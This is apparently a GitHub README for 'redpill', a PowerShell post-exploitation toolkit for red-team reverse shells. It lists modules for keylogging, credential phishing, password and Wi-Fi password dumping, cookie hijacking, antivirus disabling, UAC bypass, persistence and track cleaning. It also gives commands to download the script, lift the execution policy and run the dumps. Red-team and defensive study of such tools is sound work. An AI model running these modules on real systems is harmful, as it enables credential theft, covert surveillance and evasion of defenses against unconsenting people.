Project Description
The redpill project aims to assist reverse tcp shells in post-exploration tasks. Often in redteam engagements we
need to use unconventional ways to access target system, such as reverse tcp shells (not metasploit) in order
to bypass the defenses implemented by the system administrator. After the first stage was successful compleated
we face another type of problems: โI have (shell) access to the target system, and now what can I do with it?โ
This project consists of several PowerShell scripts that perform different post-exploitation functions and the
main script redpill.ps1 that is main work its to download/config/exe the scripts contained in this repository.
The goal is to have a similar meterpreter experience in our reverse tcp shell prompt (meterpreter similar options)
Folder Name | Description | Notes |
---|---|---|
Bin | Contains redpill main modules | Sysinfo |
Bypass | Contains redpill bypass scripts | Manual Download/Execution required |
modules | Contains redpill modules | Sherlock |
Utils | Contains BAT | PS1 scripts |
CmdLet Parameters syntax\examples
post-exploitation module. venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be easily accessible in our reverse tcp shell ( shell prompt ). ">
This cmdlet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.
venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be
easily accessible in our reverse tcp shell ( shell prompt ).
To List All Parameters Available, execute in powershell prompt:
.\redpill.ps1 -Help Parameters
CmdLet Parameter Name | Parameter Arguments | Description |
---|---|---|
-SysInfo | Enum | Verbose |
-GetConnections | Enum | Verbose |
-GetDnsCache | Enum | Clear |
-GetInstalled | Enum | Enumerate Remote Host Applications Installed |
-GetProcess | Enum | Kill |
-GetTasks | Enum | Create |
-GetLogs | Enum | Verbose |
-GetBrowsers | Enum | Verbose |
-Screenshot | 1 | Capture 1 Desktop Screenshot and Store it on %TMP% |
-Camera | Enum | Snap |
-StartWebServer | Python | Powershell |
-Keylogger | Start | Stop |
-MouseLogger | Start | Capture Screenshots of Mouse Clicks for 10 seconds |
-PhishCreds | Start | Brute |
-GetPasswords | Enum | Dump |
-WifiPasswords | Dump | ZipDump |
-EOP | Enum | Verbose |
-ADS | Enum | Create |
-BruteZip | $Env:TMP\archive.zip | Brute force sellected Zip archive with the help of 7z.exe |
-Upload | script.ps1 | Upload script.ps1 from attacker apache2 webroot |
-Persiste | $Env:TMP\Script.ps1 | Persiste script.ps1 on every startup {BeaconHome} |
-CleanTracks | Clear | Paranoid |
-AppLocker | Enum | WhoAmi |
-FileMace | $Env:TMP\test.txt | Change File Mace {CreationTime,LastAccessTime,LastWriteTime} |
-MetaData | $Env:TMP\test.exe | Display files \ applications description (metadata) |
-PEHollow | GetSystem | $Env:TMP\test.exe |
-MsgBox | โHello World.โ | Spawns โHello World.โ msgBox on local host {wscriptComObject} |
-SpeakPrank | โHello World.โ | Make remote host speak user input sentence {prank} |
-NetTrace | Enum | Agressive Enumeration with the help of netsh {native} |
-PingSweep | Enum | Verbose |
-DnsSpoof | Enum | Redirect |
-DisableAV | Query | Start |
-HiddenUser | Query | Create |
-CsOnTheFly | Compile | Execute |
-CookieHijack | Dump | History |
-UacMe | Bypass | Elevate |
To Display Detailed information about each parameter execute:
Syntax : .\redpill.ps1 -Help [ -Parameter Name ]
Example: .\redpill.ps1 -Help WifiPasswords
Instructions how to use the Cmdlet {Local tests}
This cmdlet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.
venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be
easily accessible in our reverse tcp shell ( shell ).
'this section describes how to test this Cmdlet Locally without exploiting target host'
1ยบ - Download CmdLet from GitHub repository to โLocal Diskโ
iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1
2ยบ - Set Powershell Execution Policy to โUnRestrictedโ
Set-ExecutionPolicy UnRestricted -Scope CurrentUser
3ยบ - Browse to โredpill.ps1โ storage directory
cd C:\Users\pedro\Desktop
4ยบ - Access CmdLet Help Menu {All Parameters}
.\redpill.ps1 -Help Parameters
5ยบ - Access [ -WifiPasswords ] Detailed Parameder Help
Syntax : .\redpill.ps1 -Help [ -Parameter Name ]
Example: .\redpill.ps1 -Help WifiPasswords
6ยบ - Running [ -WifiPasswords ] [ Dump ] Module
Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]
Example: .\redpill.ps1 -WifiPasswords Dump
7ยบ - Running [ -sysinfo ] [ Enum ] Module
Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]
Example: .\redpill.ps1 -sysinfo Enum
Instructions how to use the CmdLet under Venon v1.0.17.8
This cmdlet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.
venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be
easily accessible in our reverse tcp shell ( shell prompt ).
1ยบ - execute in reverse tcp shell prompt
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help Parameters
2ยบ - Access [ -WifiPasswords ] Detailed Parameter Help
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help WifiPasswords
3ยบ - Running [ -WifiPasswords ] [ Dump ] Module
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -WifiPasswords Dump
To Manual download the CmdLet for Local Tests, execute:
iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1
Video Tutorials
Demonstration - This tutorial uses: sysinfo, GetPasswords, UacMe modules
MouseLogger - Capture Screenshots of โMouseClicksโ with the help of psr.exe
PhishCreds - Phish for login credentials OR Brute Force user account password
FileMace - Change File TimeStamp {CreationTime, LastAccessTime, LastWriteTime}
CsOnTheFly - Download (from url), Auto-Compile and Execute CS scripts On-The-Fly!
EOP - Find missing software patchs for privilege escalation
Acknowledgments
hax0r | Function | OS Flavor |
---|---|---|
@youhacker55 | For All the help Debugging this cmdlet (Testing BETA version) | Windows 7 x64bits @0xyg3n |
Any collaborations Or bugreports are wellcome
SuspiciousShellActivity - RedTeam @2021